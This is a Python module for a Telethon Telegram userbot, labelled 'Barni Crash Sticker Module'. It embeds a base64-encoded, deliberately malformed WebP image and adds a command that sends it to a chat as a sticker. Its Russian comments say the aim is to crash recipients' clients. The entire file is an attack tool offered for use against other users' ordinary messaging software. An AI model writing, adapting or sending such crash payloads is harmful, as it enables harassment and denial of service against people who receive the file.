# -*- coding: utf-8 -*-
# (c) Barni Crash Sticker Module

from .. import loader
from telethon.tl.types import DocumentAttributeSticker
import base64

@loader.tds
class CrashSticker(loader.Module):
    """Отправляет краш-стикер"""
    strings = {"name": "CrashSticker"}

    # Битый webp с минимальной валидной структурой
    DATA = base64.b64decode(
        b"UklGRiIAAABXRUJQVlA4ICAAAADQAgCdASoBAAEAAQAcJaQAA3AA/v///wD///8A////"
        b"AP///wD///8A////AP///wD///8AAAAA"
    )

    async def crashcmd(self, message):
        """Отправляет краш-стикер"""
        try:
            await message.client.send_file(
                message.chat_id,
                self.DATA,
                mime_type="image/webp",
                file_name="sticker.webp",
                attributes=[
                    DocumentAttributeSticker(
                        alt="🤯", 
                        stickerset=None,
                        mask=None
                    )
                ],
                force_document=False
            )
        except Exception as e:
            await message.edit(f"Ошибка: {e}")
